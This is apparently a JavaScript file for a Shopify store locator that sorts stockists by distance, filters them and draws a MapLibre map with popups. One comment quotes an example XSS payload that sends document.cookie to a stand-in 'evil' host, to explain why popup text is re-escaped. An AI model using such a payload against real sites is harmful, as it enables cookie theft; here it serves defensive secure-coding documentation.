/* Wholesale store locator.
 *
 * Progressive enhancement only. Every store is already in the HTML; this file
 * adds distance sorting, filtering and the map. With JS off or broken the list
 * still renders and still gets indexed.
 *
 * IIFE + per-node init guard: this section can legitimately appear twice on a
 * page (theme editor previews, duplicated sections), and a top-level `class`
 * declaration would throw on the second parse.
 * See reference_shopify_duplicate_section_script.
 *
 * NO NETWORK CALLS except map tiles. Coordinates are baked into the markup by
 * Liquid, distance is computed locally, and there is no JSON endpoint to hit.
 */
(function () {
  'use strict';

  var EARTH_MI = 3958.8;
  var RADIUS_MI = 50;

  function toRad(deg) {
    return (deg * Math.PI) / 180;
  }

  /* Haversine. Runs locally so there is no geocoding API and no rate limit. */
  function distanceMi(a, b) {
    var dLat = toRad(b.lat - a.lat);
    var dLng = toRad(b.lng - a.lng);
    var lat1 = toRad(a.lat);
    var lat2 = toRad(b.lat);
    var h =
      Math.sin(dLat / 2) * Math.sin(dLat / 2) +
      Math.sin(dLng / 2) * Math.sin(dLng / 2) * Math.cos(lat1) * Math.cos(lat2);
    return 2 * EARTH_MI * Math.asin(Math.sqrt(h));
  }

  function isNarrow() {
    return window.matchMedia('(max-width: 989px)').matches;
  }

  function prefersReducedMotion() {
    return window.matchMedia('(prefers-reduced-motion: reduce)').matches;
  }

  function initLocator(root) {
    if (root.dataset.whReady === '1') return;
    root.dataset.whReady = '1';

    var listEl = root.querySelector('[data-wh-results]');
    if (!listEl) return; // zero published stores; empty state is already rendered

    var countEl = root.querySelector('[data-wh-count]');
    var emptyEl = root.querySelector('[data-wh-empty]');
    var searchForm = root.querySelector('[data-wh-search]');
    var zipInput = root.querySelector('[data-wh-zip]');
    var geoBtn = root.querySelector('[data-wh-geolocate]');
    var filterSet = root.querySelector('[data-wh-filters]');
    var mapWrap = root.querySelector('[data-wh-map]');
    var mapCanvas = root.querySelector('[data-wh-map-canvas]');
    var mapPlaceholder = root.querySelector('[data-wh-map-placeholder]');

    /* Read straight from the rendered cards. There is deliberately no separate
     * JSON payload: a second copy of the dataset is redundant weight and one
     * more thing to keep in sync. */
    var stores = Array.prototype.map.call(root.querySelectorAll('[data-wh-item]'), function (li) {
      var card = li.querySelector('[data-wh-store]');
      var nameEl = li.querySelector('.wh-store__name');
      var metaEl = li.querySelector('.wh-store__meta');
      var dirEl = li.querySelector('.wh-store__links a[href*="google.com/maps"]');
      var telEl = li.querySelector('[data-wh-tel]');
      return {
        li: li,
        card: card,
        type: li.dataset.type || '',
        name: nameEl ? nameEl.textContent.trim() : '',
        addr: metaEl ? metaEl.innerHTML : '',
        directions: dirEl ? dirEl.getAttribute('href') : '',
        tel: telEl ? telEl.getAttribute('href') : '',
        lat: parseFloat(card.dataset.lat),
        lng: parseFloat(card.dataset.lng),
        distanceEl: li.querySelector('[data-wh-distance]'),
        marker: null,
        popup: null,
      };
    });

    var state = { origin: null, type: 'all' };
    var map = null;

    var NEAREST_FALLBACK = 5;

    /* Returns {list, mode}. mode is 'all' | 'within' | 'nearest'.
     *
     * 'nearest' matters: if someone searches a ZIP with no stockist inside the
     * radius, showing an empty list reads as "this brand has no stores" and is
     * a dead end. Showing the closest few with honest distances lets them decide
     * whether a drive is worth it, and keeps the page useful everywhere. */
    function visibleStores() {
      var byType = stores.filter(function (s) {
        return state.type === 'all' || s.type === state.type;
      });
      if (!state.origin) return { list: byType, mode: 'all' };

      var located = byType.filter(function (s) {
        return s.distance !== undefined;
      });
      located.sort(function (a, b) { return a.distance - b.distance; });

      var within = located.filter(function (s) { return s.distance <= RADIUS_MI; });
      if (within.length) return { list: within, mode: 'within' };
      return { list: located.slice(0, NEAREST_FALLBACK), mode: 'nearest' };
    }

    function render() {
      stores.forEach(function (s) {
        if (state.origin && isFinite(s.lat) && isFinite(s.lng)) {
          s.distance = distanceMi(state.origin, { lat: s.lat, lng: s.lng });
        } else {
          s.distance = undefined;
        }
      });

      var result = visibleStores();
      var shown = result.list;

      stores.forEach(function (s) {
        var isShown = shown.indexOf(s) !== -1;
        s.li.hidden = !isShown;
        if (s.distanceEl) {
          if (isShown && s.distance !== undefined) {
            s.distanceEl.textContent = s.distance < 10
              ? s.distance.toFixed(1) + ' mi'
              : Math.round(s.distance) + ' mi';
            s.distanceEl.hidden = false;
          } else {
            s.distanceEl.hidden = true;
          }
        }
        if (s.marker) s.marker.getElement().style.display = isShown ? '' : 'none';
      });

      /* Reorder in the DOM so keyboard and screen reader order matches the
       * visual order. Sorting only the visuals would desync the two. */
      if (state.origin) {
        shown.forEach(function (s) {
          listEl.appendChild(s.li);
        });
      }

      applyMobileCap(shown);

      if (countEl) {
        if (result.mode === 'nearest') {
          countEl.textContent = 'Nothing within ' + RADIUS_MI + ' miles — showing the closest';
        } else if (result.mode === 'within') {
          countEl.textContent =
            (shown.length === 1 ? '1 stockist' : shown.length + ' stockists') + ' nearby';
        } else {
          countEl.textContent = shown.length === 1 ? '1 stockist' : shown.length + ' stockists';
        }
      }
      /* Only a type filter can now produce a genuinely empty list, since an
       * out-of-range search falls back to nearest. */
      if (emptyEl) emptyEl.hidden = shown.length !== 0;
      listEl.hidden = shown.length === 0;

      if (map && shown.length) fitTo(shown);
      updateScrollAffordance();
    }

    /* MOBILE LIST LENGTH.
     * 63 stacked cards is an enormous scroll on a phone, and nobody reads past
     * the first screenful of an alphabetical list. Locator apps universally
     * show a handful and let you ask for more, so we cap the visible set and
     * offer the rest. All 63 stay in the DOM, so this costs nothing for SEO or
     * for a JS-off reader — it is purely a visual truncation. */
    var MOBILE_CAP = 8;
    var showingAll = false;
    var moreBtn = null;

    function ensureMoreBtn() {
      if (moreBtn) return moreBtn;
      moreBtn = document.createElement('button');
      moreBtn.type = 'button';
      moreBtn.className = 'wh-btn wh-btn--ghost wh-more';
      moreBtn.addEventListener('click', function () {
        showingAll = true;
        render();
        moreBtn.blur();
      });
      listEl.insertAdjacentElement('afterend', moreBtn);
      return moreBtn;
    }

    function applyMobileCap(shown) {
      var cap = isNarrow() && !showingAll && shown.length > MOBILE_CAP;
      shown.forEach(function (s, i) {
        if (cap && i >= MOBILE_CAP) s.li.hidden = true;
      });
      if (!cap) {
        if (moreBtn) moreBtn.hidden = true;
        return;
      }
      var btn = ensureMoreBtn();
      btn.hidden = false;
      btn.textContent = 'Show all ' + shown.length;
    }

    /* The scroll fade is a lie when there is nothing to scroll, so drive it from
     * measured overflow rather than assuming a long list. */
    var railEl = root.querySelector('.wh-locator__rail');
    function updateScrollAffordance() {
      if (!railEl || !listEl) return;
      var canScroll = listEl.scrollHeight - listEl.clientHeight > 4;
      railEl.setAttribute('data-scrollable', canScroll ? 'true' : 'false');
      var atEnd = listEl.scrollTop + listEl.clientHeight >= listEl.scrollHeight - 4;
      railEl.setAttribute('data-at-end', atEnd ? 'true' : 'false');
    }

    /* ---------------------------------------------------------------- search */

    /* ZIP centroids ship as a theme asset so a ZIP lookup costs no network call
     * and leaks nothing to a third party. If the asset is absent the input
     * still works against store ZIPs and city names. */
    var centroids = null;
    var centroidsUrl = root.dataset.zipCentroids || '';

    function loadCentroids() {
      if (centroids || !centroidsUrl) return Promise.resolve(centroids);
      return fetch(centroidsUrl)
        .then(function (r) {
          return r.ok ? r.json() : null;
        })
        .then(function (data) {
          centroids = data;
          return centroids;
        })
        .catch(function () {
          return null;
        });
    }

    function matchByText(query) {
      var q = query.trim().toLowerCase();
      if (!q) return null;
      var hit = stores.find(function (s) {
        return s.card.textContent.toLowerCase().indexOf(q) !== -1;
      });
      return hit && isFinite(hit.lat) ? { lat: hit.lat, lng: hit.lng } : null;
    }

    function setBusy(on, msg) {
      if (countEl) {
        countEl.setAttribute('aria-busy', on ? 'true' : 'false');
        if (on && msg) countEl.textContent = msg;
      }
      if (searchForm) searchForm.classList.toggle('is-busy', !!on);
    }

    function search(query) {
      var zip = query.trim();
      if (/^\d{5}$/.test(zip)) {
        /* The ZIP centroid table is ~283KB and only fetched on the first ZIP
         * search, so this can be a visible wait on mobile. Say so. */
        showingAll = false;
        setBusy(true, 'Searching');
        loadCentroids().then(function (data) {
          setBusy(false);
          var c = data && data[zip];
          if (!c) {
            /* Unknown ZIP: do NOT silently fall back to a text match, which
             * would quietly anchor the search to an unrelated city. */
            state.origin = null;
            render();
            if (countEl) countEl.textContent = "We don't recognise that ZIP code";
            return;
          }
          state.origin = { lat: c[0], lng: c[1] };
          render();
        });
        return;
      }
      showingAll = false;
      state.origin = matchByText(query);
      render();
      if (query.trim() && !state.origin && countEl) {
        countEl.textContent = 'No match for "' + query.trim() + '"';
      }
    }

    if (searchForm) {
      searchForm.addEventListener('submit', function (e) {
        e.preventDefault();
        search(zipInput ? zipInput.value : '');
      });
    }

    if (zipInput) {
      /* Narrow as you type rather than only on submit. Debounced so a fast
       * typist does not trigger a render per keystroke, and ZIPs are left to
       * the submit path because a partial ZIP is meaningless. */
      var typeTimer = null;
      zipInput.addEventListener('input', function () {
        var v = zipInput.value.trim();
        clearTimeout(typeTimer);
        if (v === '') {
          state.origin = null;
          showingAll = false;
          render();
          return;
        }
        if (/^\d{1,5}$/.test(v)) return; // numeric: wait for submit
        typeTimer = setTimeout(function () {
          showingAll = false;
          state.origin = matchByText(v);
          render();
        }, 220);
      });
    }

    /* Geolocation is offered only when the browser supports it AND the page is
     * on a secure origin, so the button never appears as a dead control. */
    if (geoBtn && 'geolocation' in navigator && window.isSecureContext) {
      geoBtn.hidden = false;
      geoBtn.addEventListener('click', function () {
        geoBtn.disabled = true;
        navigator.geolocation.getCurrentPosition(
          function (pos) {
            geoBtn.disabled = false;
            state.origin = { lat: pos.coords.latitude, lng: pos.coords.longitude };
            if (zipInput) zipInput.value = '';
            render();
          },
          function () {
            geoBtn.disabled = false;
            /* Denied or unavailable. Say what to do instead of apologising. */
            if (zipInput) {
              zipInput.setAttribute('placeholder', 'Enter your ZIP code');
              zipInput.focus();
            }
          },
          { timeout: 8000, maximumAge: 300000 }
        );
      });
    }

    if (listEl) listEl.addEventListener('scroll', updateScrollAffordance, { passive: true });
    window.addEventListener('resize', updateScrollAffordance, { passive: true });

    /* The mobile cap is applied during render() and keyed off isNarrow(), so a
     * resize across the breakpoint left the hidden flags in place: widening a
     * phone-width window stranded 55 of 63 stores with no way back, because
     * .wh-more is display:none above 990px. Re-render on the breakpoint itself
     * rather than on every resize tick. */
    var capMq = window.matchMedia('(max-width: 989px)');
    if (capMq.addEventListener) capMq.addEventListener('change', function () { render(); });
    else if (capMq.addListener) capMq.addListener(function () { render(); });

    if (filterSet) {
      filterSet.addEventListener('change', function (e) {
        if (!e.target.name) return;
        state.type = e.target.value;
        render();
      });
    }

    /* ------------------------------------------------------------------- map */

    function brandRecolor(m) {
      /* Recolour whatever basemap the tile provider ships, rather than shipping
       * a hand-authored style that breaks the day a layer is renamed. We walk
       * the live layer list and repaint by layer type. */
      var CREAM = '#f5f3f0';
      var PAPER = '#efece7';
      var WATER = '#c9d6d3';
      var SAND = '#e6ceb8';
      var INK = '#495f5c';

      var layers = m.getStyle().layers || [];
      layers.forEach(function (layer) {
        var id = layer.id.toLowerCase();
        try {
          if (layer.type === 'background') {
            m.setPaintProperty(layer.id, 'background-color', CREAM);
          } else if (id.indexOf('water') !== -1 && layer.type === 'fill') {
            m.setPaintProperty(layer.id, 'fill-color', WATER);
          } else if (id.indexOf('building') !== -1) {
            m.setPaintProperty(layer.id, 'fill-color', PAPER);
          } else if (id.indexOf('park') !== -1 || id.indexOf('landcover') !== -1 || id.indexOf('wood') !== -1) {
            if (layer.type === 'fill') m.setPaintProperty(layer.id, 'fill-color', '#e8e9e2');
          } else if (layer.type === 'line') {
            m.setPaintProperty(layer.id, 'line-color', SAND);
          } else if (layer.type === 'symbol') {
            m.setPaintProperty(layer.id, 'text-color', INK);
            m.setPaintProperty(layer.id, 'text-halo-color', CREAM);
          }
        } catch (err) {
          /* A layer that does not accept this paint property is not an error
           * worth breaking the map over. */
        }
      });
    }

    function fitTo(list) {
      if (!map || !window.maplibregl || !list.length) return;
      var bounds = new window.maplibregl.LngLatBounds();
      var any = false;
      list.forEach(function (s) {
        if (isFinite(s.lat) && isFinite(s.lng)) {
          bounds.extend([s.lng, s.lat]);
          any = true;
        }
      });
      if (!any) return;
      map.fitBounds(bounds, {
        padding: 64,
        maxZoom: 12,
        duration: prefersReducedMotion() ? 0 : 700,
      });
    }

    /* One source of truth for selection so the card, the pin and the popup can
     * never disagree. Every locator app has this; without it a pin click looks
     * like nothing happened. */
    function select(s, opts) {
      stores.forEach(function (o) {
        o.card.removeAttribute('aria-current');
        if (o.marker) o.marker.getElement().classList.remove('is-active');
        if (o.popup && o.popup.isOpen()) o.popup.remove();
      });
      if (!s) return;
      s.card.setAttribute('aria-current', 'true');
      if (s.marker) s.marker.getElement().classList.add('is-active');
      if (s.popup && map) s.popup.addTo(map);
      /* Desktop deliberately does NOT auto-scroll. The list already sits
       * beside the map, so moving it under the cursor is disorienting rather
       * than helpful — and it was the source of the reported jumping.
       *
       * On mobile the list IS the page and a selected card can be far below
       * the map, so there we bring it into view. */
      /* The map is order:-1 on <=989px, i.e. above the list, so flying it while
       * it is off screen looks like nothing happened. */
      if (opts && opts.mapIntoView && isNarrow() && mapWrap) {
        mapWrap.scrollIntoView({
          behavior: prefersReducedMotion() ? 'auto' : 'smooth',
          block: 'nearest',
        });
      }
      if (opts && opts.scrollCard && isNarrow()) {
        s.card.scrollIntoView({
          behavior: prefersReducedMotion() ? 'auto' : 'smooth',
          block: 'center',
        });
      }
      if (opts && opts.flyTo && map && isFinite(s.lat)) {
        /* z9 is ~30km across, which still reads as "somewhere in the state".
           z12 puts the store in a recognisable neighbourhood. Math.max keeps a
           user who has already zoomed in closer from being pulled back out. */
        map.flyTo({
          center: [s.lng, s.lat],
          zoom: Math.max(map.getZoom(), 12),
          duration: prefersReducedMotion() ? 0 : 700,
        });
      }
    }

    /* Liquid escapes every store value into the card markup, but reading it back
     * with .textContent / .getAttribute DECODES that escaping, and this popup is
     * injected via setHTML (i.e. innerHTML). The escape is round-tripped away, so
     * a CRM store name of
     *   Bob's <img src=x onerror=fetch('//evil/?c='+document.cookie)>
     * would execute on zumanutrition.com the moment anyone clicked that pin.
     * Re-escape at the point of injection.
     *
     * s.addr is deliberately NOT escaped: it is read via .innerHTML, so it is
     * already-escaped markup and escaping twice would show entities as text. */
    function esc(v) {
      return String(v == null ? '' : v).replace(/[&<>"']/g, function (c) {
        return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
      });
    }

    function popupHtml(s) {
      var links = [];
      /* Calling is the primary action on a phone, so it leads when available.
       * Rendered only when the sheet actually has a number — there is no Phone
       * column today, so this stays absent until one is added. */
      if (s.tel) {
        links.push('<a class="wh-pop__link wh-pop__link--call" href="' + esc(s.tel) + '">Call</a>');
      }
      if (s.directions) {
        links.push(
          '<a class="wh-pop__link" target="_blank" rel="noopener" href="' + esc(s.directions) + '">Directions</a>',
        );
      }
      return (
        '<div class="wh-pop">' +
        '<p class="wh-pop__name">' + esc(s.name) + '</p>' +
        '<p class="wh-pop__addr">' + s.addr + '</p>' +
        (links.length ? '<p class="wh-pop__links">' + links.join('') + '</p>' : '') +
        '</div>'
      );
    }

    /* Card interactions are wired for EVERY store, including the ones Census
     * could not geocode. Previously this lived inside buildMarkers(), which
     * returns early when a store has no coordinates, so those cards (e.g.
     * "Food and Thought Organic Market") were completely inert. */
    function wireCards() {
      stores.forEach(function (s) {
        s.card.addEventListener('click', function (ev) {
          if (ev.target.closest('a')) return; // let real links work
          /* Only take focus on narrow screens, where the card is the thing the
           * user is operating. On desktop the map moves and the page must not:
           * focus() can scroll even with preventScroll on browsers that ignore
           * the option. */
          if (isNarrow()) {
            try { s.card.focus({ preventScroll: true }); } catch (e) { /* noop */ }
          }
          var located = isFinite(s.lat) && isFinite(s.lng);
          select(s, { flyTo: located, mapIntoView: located });
        });
        s.card.addEventListener('keydown', function (ev) {
          /* Only when the CARD itself has focus. A keydown on a descendant <a>
           * bubbles here, and preventDefault() below then cancels the link's own
           * activation -- so Directions and Website were reachable by keyboard but
           * impossible to trigger. Pointer users never saw it. */
          if (ev.target !== s.card) return;
          if (ev.key === 'Enter' || ev.key === ' ') {
            ev.preventDefault();
            s.card.click();
          }
        });
      });
    }

    function buildMarkers() {
      stores.forEach(function (s) {
        if (!isFinite(s.lat) || !isFinite(s.lng)) return;

        /* Marker root is a POSITIONING element only. MapLibre writes
         * transform: translate(...) to it on every frame of a zoom/pan, so it
         * must never carry a CSS transition — that is what made the pins lag
         * behind the map and snap into place once motion stopped. All visual
         * state lives on the inner dot, which MapLibre never touches. */
        var el = document.createElement('button');
        el.type = 'button';
        el.className = 'wh-pin';
        var dot = document.createElement('span');
        dot.className = 'wh-pin__dot';
        el.appendChild(dot);
        /* The map is aria-hidden, so pins must not be reachable by keyboard.
         * The list is the accessible path to every store. */
        el.setAttribute('tabindex', '-1');
        el.setAttribute('aria-hidden', 'true');

        el.addEventListener('click', function (ev) {
          ev.stopPropagation();
          select(s, { scrollCard: true });
        });

        s.marker = new window.maplibregl.Marker({ element: el })
          .setLngLat([s.lng, s.lat])
          .addTo(map);

        s.popup = new window.maplibregl.Popup({
          offset: 16,
          closeButton: false,
          className: 'wh-popup',
          maxWidth: '260px',
          /* THE page-jump culprit. MapLibre focuses a popup when it opens, and
           * the browser then scrolls that newly focused element into view —
           * which yanked the page whenever a pin or card was clicked. It is
           * also what drew the outline around Directions; the CSS fix earlier
           * only hid that symptom.
           *
           * Safe to disable here: pins are aria-hidden and tabindex -1, so the
           * popup is not a keyboard destination, and every link inside it also
           * exists in the card, which IS the keyboard path. */
          focusAfterOpen: false,
        })
          .setLngLat([s.lng, s.lat])
          .setHTML(popupHtml(s));

        /* Hovering a card previews its pin; clicking a card commits the
         * selection and flies the map to it. */
        s.card.addEventListener('mouseenter', function () {
          el.classList.add('is-hover');
        });
        s.card.addEventListener('mouseleave', function () {
          el.classList.remove('is-hover');
        });

      });
    }

    function loadScript(src) {
      return new Promise(function (resolve, reject) {
        if (window.maplibregl) return resolve();
        var el = document.createElement('script');
        el.src = src;
        el.async = true;
        el.onload = resolve;
        el.onerror = reject;
        document.head.appendChild(el);
      });
    }

    function loadCss(href) {
      if (document.querySelector('link[data-wh-map-css]')) return;
      var link = document.createElement('link');
      link.rel = 'stylesheet';
      link.href = href;
      link.setAttribute('data-wh-map-css', '');
      document.head.appendChild(link);
    }

    function initMap() {
      var scriptUrl = root.dataset.mapScript;
      var styleUrl = root.dataset.mapStyle;
      if (!scriptUrl || !styleUrl || !mapCanvas) return;

      // Explicit URL rather than deriving it from the script URL: Shopify asset
      // URLs carry a ?v= cache-busting query string, so a naive .js -> .css
      // replace produces a 404.
      loadCss(root.dataset.mapCss || scriptUrl.replace(/\.js$/, '.css'));

      loadScript(scriptUrl)
        .then(function () {
          map = new window.maplibregl.Map({
            container: mapCanvas,
            style: styleUrl,
            center: [-98.5, 39.8], // continental US
            zoom: 3,
            attributionControl: true,
            /* SCROLL TRAPPING. NN/G: interactive maps on mobile location pages
             * "cause major usability issues when users attempt to scroll down
             * the page to look for a list of results and instead inadvertently
             * activate the map's pan functionality."
             *
             * Our map sits above the list on mobile at 300px+, directly in the
             * scroll path, so a swipe that lands on it pans the map instead of
             * scrolling the page. Cooperative gestures require two fingers to
             * pan (and ctrl/cmd + scroll to zoom on desktop), which is exactly
             * how an embedded Google Map behaves — familiar, and it hands the
             * page's scroll back to the user. */
            cooperativeGestures: true,
            /* The map is a supporting visual, not the accessible path. Keyboard
             * users navigate the list; trapping tab focus in a canvas helps
             * nobody. */
            keyboard: false,
          });

          map.addControl(new window.maplibregl.NavigationControl({ showCompass: false }), 'top-right');
          /* Clicking bare map clears selection, which is what every map UI does
             and what people try instinctively to dismiss a popup. */
          map.on('click', function () { select(null); });

          /* The canvas ships with tabindex="0" -- MapLibre sets it whenever the map
           * is interactive, regardless of keyboard:false -- which is a tab stop that
           * does nothing for keyboard users, since the list is the accessible path.
           * -1 keeps it fully mouse/touch interactive while taking it out of the tab
           * order. Real controls (zoom, attribution) stay reachable.
           *
           * This replaces an `inert` attribute on the container, which removed the
           * focus black hole but also disabled dragging, +/- and pin clicks. */
          map.getCanvas().setAttribute('tabindex', '-1');

          map.on('load', function () {
            brandRecolor(map);
            buildMarkers();
            if (mapPlaceholder) mapPlaceholder.hidden = true;
            render();
          });

          map.on('error', function () {
            /* Tiles failed. The list above is unaffected, so say what is true
               rather than implying the page is broken. */
            var st = root.querySelector('[data-wh-map-status]');
            if (mapPlaceholder) mapPlaceholder.hidden = false;
            if (st) st.textContent = 'Map unavailable — the list below still works';
            mapPlaceholder && mapPlaceholder.classList.add('is-error');
          });
        })
        .catch(function () {
          /* Library unreachable. The list is unaffected, which is the whole
           * point of rendering it server-side. */
          var st = root.querySelector('[data-wh-map-status]');
          if (st) st.textContent = 'Map unavailable — the list below still works';
          mapPlaceholder && mapPlaceholder.classList.add('is-error');
        });
    }

    /* Defer the ~200KB map library until it is actually about to be seen. */
    if (mapWrap && 'IntersectionObserver' in window) {
      var io = new IntersectionObserver(
        function (entries) {
          if (entries.some(function (e) { return e.isIntersecting; })) {
            io.disconnect();
            initMap();
          }
        },
        { rootMargin: '200px' }
      );
      io.observe(mapWrap);
    } else if (mapWrap) {
      initMap();
    }

    wireCards();
    render();
  }

  function boot() {
    document.querySelectorAll('[data-wh-locator]').forEach(initLocator);
  }

  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', boot);
  } else {
    boot();
  }

  /* Theme editor re-renders sections without a page load. */
  document.addEventListener('shopify:section:load', function (e) {
    var root = e.target.querySelector('[data-wh-locator]');
    if (root) initLocator(root);
  });
})();
